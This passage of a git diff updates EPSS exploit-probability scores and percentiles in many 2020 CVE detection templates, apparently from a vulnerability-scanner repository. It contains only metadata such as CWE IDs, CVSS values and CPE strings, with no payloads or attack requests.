b/http/cves/2020/CVE-2020-13158.yaml @@ -20,8 +20,8 @@ info: cvss-score: 7.5 cve-id: CVE-2020-13158 cwe-id: CWE-22 - epss-score: 0.92333 - epss-percentile: 0.99711 + epss-score: 0.92396 + epss-percentile: 0.99715 cpe: cpe:2.3:a:articatech:artica_proxy:*:*:*:*:community:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-13167.yaml b/http/cves/2020/CVE-2020-13167.yaml index af22f2e5b20..7d2e5bf45bd 100644 --- a/http/cves/2020/CVE-2020-13167.yaml +++ b/http/cves/2020/CVE-2020-13167.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2020-13167 cwe-id: CWE-78 epss-score: 0.93127 - epss-percentile: 0.9978 + epss-percentile: 0.99779 cpe: cpe:2.3:a:netsweeper:netsweeper:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2020/CVE-2020-13258.yaml b/http/cves/2020/CVE-2020-13258.yaml index 0958caaf725..7b3e239c734 100644 --- a/http/cves/2020/CVE-2020-13258.yaml +++ b/http/cves/2020/CVE-2020-13258.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2020-13258 cwe-id: CWE-79 epss-score: 0.02668 - epss-percentile: 0.8539 + epss-percentile: 0.85386 cpe: cpe:2.3:a:contentful:python_example:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-13379.yaml b/http/cves/2020/CVE-2020-13379.yaml index 34816bb8d7d..07274808557 100644 --- a/http/cves/2020/CVE-2020-13379.yaml +++ b/http/cves/2020/CVE-2020-13379.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2020-13379 cwe-id: CWE-918 epss-score: 0.93254 - epss-percentile: 0.99792 + epss-percentile: 0.99791 cpe: cpe:2.3:a:grafana:grafana:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2020/CVE-2020-13405.yaml b/http/cves/2020/CVE-2020-13405.yaml index f8d763efb8f..ff2587403c1 100644 --- a/http/cves/2020/CVE-2020-13405.yaml +++ b/http/cves/2020/CVE-2020-13405.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2020-13405 cwe-id: CWE-306 epss-score: 0.53325 - epss-percentile: 0.97886 + epss-percentile: 0.97882 cpe: cpe:2.3:a:microweber:microweber:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2020/CVE-2020-13483.yaml b/http/cves/2020/CVE-2020-13483.yaml index c99f8c9e33a..b3869bf61e6 100644 --- a/http/cves/2020/CVE-2020-13483.yaml +++ b/http/cves/2020/CVE-2020-13483.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2020-13483 cwe-id: CWE-79 epss-score: 0.26042 - epss-percentile: 0.96117 + epss-percentile: 0.9612 cpe: cpe:2.3:a:bitrix24:bitrix24:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2020/CVE-2020-13820.yaml b/http/cves/2020/CVE-2020-13820.yaml index ca737deb6a8..b05dcd155bf 100644 --- a/http/cves/2020/CVE-2020-13820.yaml +++ b/http/cves/2020/CVE-2020-13820.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2020-13820 cwe-id: CWE-79 epss-score: 0.17063 - epss-percentile: 0.94774 + epss-percentile: 0.94773 cpe: cpe:2.3:a:extremenetworks:extreme_management_center:8.4.1.24:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2020/CVE-2020-13886.yaml b/http/cves/2020/CVE-2020-13886.yaml index e7ae1bb20e5..bb665b706e3 100644 --- a/http/cves/2020/CVE-2020-13886.yaml +++ b/http/cves/2020/CVE-2020-13886.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2020-13886 cwe-id: CWE-22 epss-score: 0.01809 - epss-percentile: 0.82374 + epss-percentile: 0.82372 cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 metadata: diff --git a/http/cves/2020/CVE-2020-13927.yaml b/http/cves/2020/CVE-2020-13927.yaml index 699e476abd6..da60549d1e4 100644 --- a/http/cves/2020/CVE-2020-13927.yaml +++ b/http/cves/2020/CVE-2020-13927.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2020-13927 cwe-id: CWE-1188 epss-score: 0.94186 - epss-percentile: 0.99914 + epss-percentile: 0.99913 cpe: cpe:2.3:a:apache:airflow:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2020/CVE-2020-13937.yaml b/http/cves/2020/CVE-2020-13937.yaml index 9445a90331e..5eee0ed3e3d 100644 --- a/http/cves/2020/CVE-2020-13937.yaml +++ b/http/cves/2020/CVE-2020-13937.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2020-13937 cwe-id: CWE-922 epss-score: 0.93845 - epss-percentile: 0.99858 + epss-percentile: 0.99857 cpe: cpe:2.3:a:apache:kylin:2.0.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-13945.yaml b/http/cves/2020/CVE-2020-13945.yaml index 0dd78dbca2e..3de6958ae65 100644 --- a/http/cves/2020/CVE-2020-13945.yaml +++ b/http/cves/2020/CVE-2020-13945.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2020-13945 cwe-id: CWE-522 epss-score: 0.93434 - epss-percentile: 0.99809 + epss-percentile: 0.99808 cpe: cpe:2.3:a:apache:apisix:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2020/CVE-2020-14092.yaml b/http/cves/2020/CVE-2020-14092.yaml index 5cb4a463ea6..e347646085f 100644 --- a/http/cves/2020/CVE-2020-14092.yaml +++ b/http/cves/2020/CVE-2020-14092.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2020-14092 cwe-id: CWE-89 epss-score: 0.85956 - epss-percentile: 0.99361 + epss-percentile: 0.99363 cpe: cpe:2.3:a:ithemes:paypal_pro:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-14179.yaml b/http/cves/2020/CVE-2020-14179.yaml index 0cb20adeae9..75f90df9344 100644 --- a/http/cves/2020/CVE-2020-14179.yaml +++ b/http/cves/2020/CVE-2020-14179.yaml @@ -19,8 +19,8 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cve-id: CVE-2020-14179 - epss-score: 0.92855 - epss-percentile: 0.99755 + epss-score: 0.92952 + epss-percentile: 0.99765 cpe: cpe:2.3:a:atlassian:jira_data_center:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-14181.yaml b/http/cves/2020/CVE-2020-14181.yaml index 4dcc927872d..d40d03fbcb7 100644 --- a/http/cves/2020/CVE-2020-14181.yaml +++ b/http/cves/2020/CVE-2020-14181.yaml @@ -20,8 +20,8 @@ info: cvss-score: 5.3 cve-id: CVE-2020-14181 cwe-id: CWE-200 - epss-score: 0.93124 - epss-percentile: 0.9978 + epss-score: 0.93267 + epss-percentile: 0.99793 cpe: cpe:2.3:a:atlassian:data_center:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-14408.yaml b/http/cves/2020/CVE-2020-14408.yaml index 12e5c1a35b1..57513f626b8 100644 --- a/http/cves/2020/CVE-2020-14408.yaml +++ b/http/cves/2020/CVE-2020-14408.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2020-14408 cwe-id: CWE-79 epss-score: 0.01606 - epss-percentile: 0.81332 + epss-percentile: 0.81324 cpe: cpe:2.3:a:agentejo:cockpit:0.10.2:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2020/CVE-2020-14413.yaml b/http/cves/2020/CVE-2020-14413.yaml index 0364842d223..6ba7f0ee32c 100644 --- a/http/cves/2020/CVE-2020-14413.yaml +++ b/http/cves/2020/CVE-2020-14413.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2020-14413 cwe-id: CWE-79 epss-score: 0.15743 - epss-percentile: 0.94508 + epss-percentile: 0.94507 cpe: cpe:2.3:a:nedi:nedi:1.9c:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-14864.yaml b/http/cves/2020/CVE-2020-14864.yaml index 60482ff3b3c..9b23f5f95f4 100644 --- a/http/cves/2020/CVE-2020-14864.yaml +++ b/http/cves/2020/CVE-2020-14864.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2020-14864 cwe-id: CWE-22 epss-score: 0.94019 - epss-percentile: 0.9989 + epss-percentile: 0.99888 cpe: cpe:2.3:a:oracle:business_intelligence:5.5.0.0.0:*:*:*:enterprise:*:*:* metadata: max-request: 2 diff --git a/http/cves/2020/CVE-2020-14883.yaml b/http/cves/2020/CVE-2020-14883.yaml index abb1a163602..04636e2997e 100644 --- a/http/cves/2020/CVE-2020-14883.yaml +++ b/http/cves/2020/CVE-2020-14883.yaml @@ -21,7 +21,7 @@ info: cvss-score: 7.2 cve-id: CVE-2020-14883 epss-score: 0.94439 - epss-percentile: 0.99987 + epss-percentile: 0.99986 cpe: cpe:2.3:a:oracle:weblogic_server:10.3.6.0.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2020/CVE-2020-15050.yaml b/http/cves/2020/CVE-2020-15050.yaml index 94cd95beea3..dc0577bab61 100644 --- a/http/cves/2020/CVE-2020-15050.yaml +++ b/http/cves/2020/CVE-2020-15050.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2020-15050 cwe-id: CWE-22 epss-score: 0.79206 - epss-percentile: 0.99023 + epss-percentile: 0.99022 cpe: cpe:2.3:a:supremainc:biostar_2:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-15148.yaml b/http/cves/2020/CVE-2020-15148.yaml index 78bee028273..417f7b98068 100644 --- a/http/cves/2020/CVE-2020-15148.yaml +++ b/http/cves/2020/CVE-2020-15148.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2020-15148 cwe-id: CWE-502 epss-score: 0.93433 - epss-percentile: 0.99809 + epss-percentile: 0.99808 cpe: cpe:2.3:a:yiiframework:yii:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-15500.yaml b/http/cves/2020/CVE-2020-15500.yaml index b4ecdc2dcee..997c655b123 100644 --- a/http/cves/2020/CVE-2020-15500.yaml +++ b/http/cves/2020/CVE-2020-15500.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2020-15500 cwe-id: CWE-79 epss-score: 0.19227 - epss-percentile: 0.95162 + epss-percentile: 0.95161 cpe: cpe:2.3:a:tileserver:tileservergl:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-15895.yaml b/http/cves/2020/CVE-2020-15895.yaml index 1333167c4b3..167e0cefeb8 100644 --- a/http/cves/2020/CVE-2020-15895.yaml +++ b/http/cves/2020/CVE-2020-15895.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2020-15895 cwe-id: CWE-79 epss-score: 0.41498 - epss-percentile: 0.97289 + epss-percentile: 0.97287 cpe: cpe:2.3:o:dlink:dir-816l_firmware:2.06:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-15906.yaml b/http/cves/2020/CVE-2020-15906.yaml index b3ccb0a457b..897ef1e2c67 100644 --- a/http/cves/2020/CVE-2020-15906.yaml +++ b/http/cves/2020/CVE-2020-15906.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2020-15906 cwe-id: CWE-307 epss-score: 0.91138 - epss-percentile: 0.99626 + epss-percentile: 0.99624 cpe: cpe:2.3:a:tiki:tiki:*:*:*:*:*:*:*:* metadata: vendor: tiki diff --git a/http/cves/2020/CVE-2020-16846.yaml b/http/cves/2020/CVE-2020-16846.yaml index fe292644185..8d7e70a9957 100644 --- a/http/cves/2020/CVE-2020-16846.yaml +++ b/http/cves/2020/CVE-2020-16846.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2020-16846 cwe-id: CWE-78 epss-score: 0.94387 - epss-percentile: 0.99969 + epss-percentile: 0.99967 cpe: cpe:2.3:a:saltstack:salt:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-17453.yaml b/http/cves/2020/CVE-2020-17453.yaml index 10d105934b7..68e00ff0a0c 100644 --- a/http/cves/2020/CVE-2020-17453.yaml +++ b/http/cves/2020/CVE-2020-17453.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2020-17453 cwe-id: CWE-79 epss-score: 0.64438 - epss-percentile: 0.98387 + epss-percentile: 0.98389 cpe: cpe:2.3:a:wso2:api_manager:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-17456.yaml b/http/cves/2020/CVE-2020-17456.yaml index 398171ce5a8..3b5cc79c0a0 100644 --- a/http/cves/2020/CVE-2020-17456.yaml +++ b/http/cves/2020/CVE-2020-17456.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2020-17456 cwe-id: CWE-78 epss-score: 0.9004 - epss-percentile: 0.99563 + epss-percentile: 0.99562 cpe: cpe:2.3:h:seowonintech:slc-130:-:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2020/CVE-2020-17463.yaml b/http/cves/2020/CVE-2020-17463.yaml index 9af82d7ddd4..efccf71a22c 100644 --- a/http/cves/2020/CVE-2020-17463.yaml +++ b/http/cves/2020/CVE-2020-17463.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2020-17463 cwe-id: CWE-89 epss-score: 0.15269 - epss-percentile: 0.94406 + epss-percentile: 0.94403 cpe: cpe:2.3:a:thedaylightstudio:fuel_cms:1.4.7:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2020/CVE-2020-17496.yaml b/http/cves/2020/CVE-2020-17496.yaml index 1c50db2ec20..29ad154f67a 100644 --- a/http/cves/2020/CVE-2020-17496.yaml +++ b/http/cves/2020/CVE-2020-17496.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2020-17496 cwe-id: CWE-74 epss-score: 0.94222 - epss-percentile: 0.99919 + epss-percentile: 0.99918 cpe: cpe:2.3:a:vbulletin:vbulletin:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-17505.yaml b/http/cves/2020/CVE-2020-17505.yaml index f2895d7b121..6d127a06c4f 100644 --- a/http/cves/2020/CVE-2020-17505.yaml +++ b/http/cves/2020/CVE-2020-17505.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2020-17505 cwe-id: CWE-78 epss-score: 0.90192 - epss-percentile: 0.99572 + epss-percentile: 0.99571 cpe: cpe:2.3:a:articatech:web_proxy:4.30.000000:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2020/CVE-2020-17506.yaml b/http/cves/2020/CVE-2020-17506.yaml index b74056bc6db..67a0cab9ca7 100644 --- a/http/cves/2020/CVE-2020-17506.yaml +++ b/http/cves/2020/CVE-2020-17506.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2020-17506 cwe-id: CWE-89 epss-score: 0.91971 - epss-percentile: 0.99682 + epss-percentile: 0.99681 cpe: cpe:2.3:a:articatech:web_proxy:4.30.000000:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-17526.yaml b/http/cves/2020/CVE-2020-17526.yaml index ec51bc6815f..5f9a2abc1a2 100644 --- a/http/cves/2020/CVE-2020-17526.yaml +++ b/http/cves/2020/CVE-2020-17526.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2020-17526 cwe-id: CWE-287 epss-score: 0.91172 - epss-percentile: 0.99628 + epss-percentile: 0.99627 cpe: cpe:2.3:a:apache:airflow:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2020/CVE-2020-19283.yaml b/http/cves/2020/CVE-2020-19283.yaml index 46efd8b4666..e95b99fb033 100644 --- a/http/cves/2020/CVE-2020-19283.yaml +++ b/http/cves/2020/CVE-2020-19283.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2020-19283 cwe-id: CWE-79 epss-score: 0.01992 - epss-percentile: 0.83196 + epss-percentile: 0.83194 cpe: cpe:2.3:a:jeesns:jeesns:1.4.2:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-19295.yaml b/http/cves/2020/CVE-2020-19295.yaml index 4b7f23b49ee..82eb500688c 100644 --- a/http/cves/2020/CVE-2020-19295.yaml +++ b/http/cves/2020/CVE-2020-19295.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2020-19295 cwe-id: CWE-79 epss-score: 0.11021 - epss-percentile: 0.93212 + epss-percentile: 0.93207 cpe: cpe:2.3:a:jeesns:jeesns:1.4.2:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-19363.yaml b/http/cves/2020/CVE-2020-19363.yaml index 721be62d86a..fb9d47c4bec 100644 --- a/http/cves/2020/CVE-2020-19363.yaml +++ b/http/cves/2020/CVE-2020-19363.yaml @@ -17,8 +17,8 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cve-id: CVE-2020-19363 - epss-score: 0.20784 - epss-percentile: 0.95423 + epss-score: 0.0561 + epss-percentile: 0.90052 cwe-id: CWE-200 metadata: verified: true diff --git a/http/cves/2020/CVE-2020-1943.yaml b/http/cves/2020/CVE-2020-1943.yaml index b1b4c5eafbf..ea46d681f54 100644 --- a/http/cves/2020/CVE-2020-1943.yaml +++ b/http/cves/2020/CVE-2020-1943.yaml @@ -20,8 +20,8 @@ info: cvss-score: 6.1 cve-id: CVE-2020-1943 cwe-id: CWE-79 - epss-score: 0.86811 - epss-percentile: 0.99404 + epss-score: 0.84002 + epss-percentile: 0.99275 cpe: cpe:2.3:a:apache:ofbiz:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-19515.yaml b/http/cves/2020/CVE-2020-19515.yaml index c835dcb9475..3b42d1da5e4 100644 --- a/http/cves/2020/CVE-2020-19515.yaml +++ b/http/cves/2020/CVE-2020-19515.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2020-19515 cwe-id: CWE-79 epss-score: 0.04532 - epss-percentile: 0.88829 + epss-percentile: 0.88827 cpe: cpe:2.3:a:qdpm:qdpm:9.1:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2020/CVE-2020-20285.yaml b/http/cves/2020/CVE-2020-20285.yaml index 7721763087e..d119da654cf 100644 --- a/http/cves/2020/CVE-2020-20285.yaml +++ b/http/cves/2020/CVE-2020-20285.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2020-20285 cwe-id: CWE-79 epss-score: 0.06066 - epss-percentile: 0.90459 + epss-percentile: 0.90462 cpe: cpe:2.3:a:zzcms:zzcms:2019:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2020/CVE-2020-20300.yaml b/http/cves/2020/CVE-2020-20300.yaml index e7983c08095..63f902d0ad5 100644 --- a/http/cves/2020/CVE-2020-20300.yaml +++ b/http/cves/2020/CVE-2020-20300.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2020-20300 cwe-id: CWE-89 epss-score: 0.57146 - epss-percentile: 0.9806 + epss-percentile: 0.98059 cpe: cpe:2.3:a:weiphp:weiphp:5.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2020/CVE-2020-20601.yaml b/http/cves/2020/CVE-2020-20601.yaml index 74ad821fa74..3594ccecef5 100644 --- a/http/cves/2020/CVE-2020-20601.yaml +++ b/http/cves/2020/CVE-2020-20601.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2020-20601 cwe-id: CWE-94 epss-score: 0.48111 - epss-percentile: 0.97634 + epss-percentile: 0.97629 cpe: cpe:2.3:a:thinkcmf:thinkcmf:x2.2.2:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2020/CVE-2020-20627.yaml b/http/cves/2020/CVE-2020-20627.yaml index 48a1ad04eaa..2e8be434208 100644 --- a/http/cves/2020/CVE-2020-20627.yaml +++ b/http/cves/2020/CVE-2020-20627.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2020-20627 cwe-id: CWE-306 epss-score: 0.06148 - epss-percentile: 0.9053 + epss-percentile: 0.90532 cpe: cpe:2.3:a:givewp:givewp:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2020/CVE-2020-20988.yaml b/http/cves/2020/CVE-2020-20988.yaml index 970b408cfa5..86e39297be1 100644 --- a/http/cves/2020/CVE-2020-20988.yaml +++ b/http/cves/2020/CVE-2020-20988.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2020-20988 cwe-id: CWE-79 epss-score: 0.02329 - epss-percentile: 0.84417 + epss-percentile: 0.84414 cpe: cpe:2.3:a:domainmod:domainmod:4.13.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2020/CVE-2020-2103.yaml b/http/cves/2020/CVE-2020-2103.yaml index ffe0211e1af..57d496b6804 100644 --- a/http/cves/2020/CVE-2020-2103.yaml +++ b/http/cves/2020/CVE-2020-2103.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2020-2103 cwe-id: CWE-200 epss-score: 0.45215 - epss-percentile: 0.97491 + epss-percentile: 0.97485 cpe: cpe:2.3:a:jenkins:jenkins:*:*:*:*:lts:*:*:* metadata: max-request: 2 diff --git a/http/cves/2020/CVE-2020-21224.yaml b/http/cves/2020/CVE-2020-21224.yaml index e714d06f355..b87d7c7dcdc 100644 --- a/http/cves/2020/CVE-2020-21224.yaml +++ b/http/cves/2020/CVE-2020-21224.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2020-21224 cwe-id: CWE-88 epss-score: 0.9214 - epss-percentile: 0.99694 + epss-percentile: 0.99693 cpe: cpe:2.3:a:inspur:clusterengine:4.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-2140.yaml b/http/cves/2020/CVE-2020-2140.yaml index acb32259d77..17745515d67 100644 --- a/http/cves/2020/CVE-2020-2140.yaml +++ b/http/cves/2020/CVE-2020-2140.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2020-2140 cwe-id: CWE-79 epss-score: 0.44807 - epss-percentile: 0.97467 + epss-percentile: 0.97463 cpe: cpe:2.3:a:jenkins:audit_trail:*:*:*:*:*:jenkins:*:* metadata: max-request: 2 diff --git a/http/cves/2020/CVE-2020-21998.yaml b/http/cves/2020/CVE-2020-21998.yaml index 90eade6e193..d00ccab1a52 100644 --- a/http/cves/2020/CVE-2020-21998.yaml +++ b/http/cves/2020/CVE-2020-21998.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2020-21998 cwe-id: CWE-601 epss-score: 0.01964 - epss-percentile: 0.83089 + epss-percentile: 0.83087 cpe: cpe:2.3:a:homeautomation_project:homeautomation:3.3.2:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2020/CVE-2020-22165.yaml b/http/cves/2020/CVE-2020-22165.yaml index 36dae0520fd..006d5e2d7aa 100644 --- a/http/cves/2020/CVE-2020-22165.yaml +++ b/http/cves/2020/CVE-2020-22165.yaml @@ -18,7 +18,7 @@ info: cvss-score: 7.5 cve-id: CVE-2020-22165 epss-score: 0.23655 - epss-percentile: 0.95809 + epss-percentile: 0.95813 cwe-id: CWE-89 cpe: cpe:2.3:a:phpgurukul:hospital_management_system:4.0:*:*:*:*:*:*:* metadata: diff --git a/http/cves/2020/CVE-2020-22208.yaml b/http/cves/2020/CVE-2020-22208.yaml index dc20aa0349e..3f2eaf2c125 100644 --- a/http/cves/2020/CVE-2020-22208.yaml +++ b/http/cves/2020/CVE-2020-22208.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2020-22208 cwe-id: CWE-89 epss-score: 0.40354 - epss-percentile: 0.97225 + epss-percentile: 0.97223 cpe: cpe:2.3:a:74cms:74cms:3.2.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-22209.yaml b/http/cves/2020/CVE-2020-22209.yaml index 537a9457a4b..6a9cb60980f 100644 --- a/http/cves/2020/CVE-2020-22209.yaml +++ b/http/cves/2020/CVE-2020-22209.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2020-22209 cwe-id: CWE-89 epss-score: 0.45915 - epss-percentile: 0.97521 + epss-percentile: 0.97518 cpe: cpe:2.3:a:74cms:74cms:3.2.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-22210.yaml b/http/cves/2020/CVE-2020-22210.yaml index 23cd3c91087..4d26e4fce5b 100644 --- a/http/cves/2020/CVE-2020-22210.yaml +++ b/http/cves/2020/CVE-2020-22210.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2020-22210 cwe-id: CWE-89 epss-score: 0.45915 - epss-percentile: 0.97521 + epss-percentile: 0.97518 cpe: cpe:2.3:a:74cms:74cms:3.2.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-23015.yaml b/http/cves/2020/CVE-2020-23015.yaml index f78374f5267..140a2f1e5d7 100644 --- a/http/cves/2020/CVE-2020-23015.yaml +++ b/http/cves/2020/CVE-2020-23015.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2020-23015 cwe-id: CWE-601 epss-score: 0.07905 - epss-percentile: 0.91773 + epss-percentile: 0.9177 cpe: cpe:2.3:a:opnsense:opnsense:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-23517.yaml b/http/cves/2020/CVE-2020-23517.yaml index be969f5ce55..992614d557d 100644 --- a/http/cves/2020/CVE-2020-23517.yaml +++ b/http/cves/2020/CVE-2020-23517.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2020-23517 cwe-id: CWE-79 epss-score: 0.13375 - epss-percentile: 0.93965 + epss-percentile: 0.93961 cpe: cpe:2.3:a:aryanic:high_cms:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2020/CVE-2020-23697.yaml b/http/cves/2020/CVE-2020-23697.yaml index b9cc9b00c71..bfac0344412 100644 --- a/http/cves/2020/CVE-2020-23697.yaml +++ b/http/cves/2020/CVE-2020-23697.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2020-23697 cwe-id: CWE-79 epss-score: 0.092 - epss-percentile: 0.92461 + epss-percentile: 0.92455 cpe: cpe:2.3:a:monstra:monstra_cms:3.0.4:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2020/CVE-2020-23814.yaml b/http/cves/2020/CVE-2020-23814.yaml index c6cdca31abe..b4c6dbcdb4f 100644 --- a/http/cves/2020/CVE-2020-23814.yaml +++ b/http/cves/2020/CVE-2020-23814.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2020-23814 cwe-id: CWE-79 epss-score: 0.01905 - epss-percentile: 0.82807 + epss-percentile: 0.82804 cpe: cpe:2.3:a:xuxueli:xxl-job:2.2.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2020/CVE-2020-24186.yaml b/http/cves/2020/CVE-2020-24186.yaml index b19eead1269..c886b3146a0 100644 --- a/http/cves/2020/CVE-2020-24186.yaml +++ b/http/cves/2020/CVE-2020-24186.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2020-24186 cwe-id: CWE-434 epss-score: 0.94213 - epss-percentile: 0.99918 + epss-percentile: 0.99916 cpe: cpe:2.3:a:gvectors:wpdiscuz:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2020/CVE-2020-24223.yaml b/http/cves/2020/CVE-2020-24223.yaml index 86ffd3c560c..867d4cff4db 100644 --- a/http/cves/2020/CVE-2020-24223.yaml +++ b/http/cves/2020/CVE-2020-24223.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2020-24223 cwe-id: CWE-79 epss-score: 0.15272 - epss-percentile: 0.94407 + epss-percentile: 0.94404 cpe: cpe:2.3:a:mara_cms_project:mara_cms:7.5:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-24285.yaml b/http/cves/2020/CVE-2020-24285.yaml index f2c4182472c..9c357858193 100644 --- a/http/cves/2020/CVE-2020-24285.yaml +++ b/http/cves/2020/CVE-2020-24285.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2020-24285 cwe-id: CWE-200 epss-score: 0.13052 - epss-percentile: 0.93879 + epss-percentile: 0.93875 cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 metadata: diff --git a/http/cves/2020/CVE-2020-24312.yaml b/http/cves/2020/CVE-2020-24312.yaml index a440b8e0137..4a5721a95bb 100644 --- a/http/cves/2020/CVE-2020-24312.yaml +++ b/http/cves/2020/CVE-2020-24312.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2020-24312 cwe-id: CWE-552 epss-score: 0.51624 - epss-percentile: 0.97805 + epss-percentile: 0.97801 cpe: cpe:2.3:a:webdesi9:file_manager:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-24391.yaml b/http/cves/2020/CVE-2020-24391.yaml index 9d1529d3ae2..fa24aefb236 100644 --- a/http/cves/2020/CVE-2020-24391.yaml +++ b/http/cves/2020/CVE-2020-24391.yaml @@ -20,7 +20,7 @@ info: cvss-score: 9.8 cve-id: CVE-2020-24391 epss-score: 0.92863 - epss-percentile: 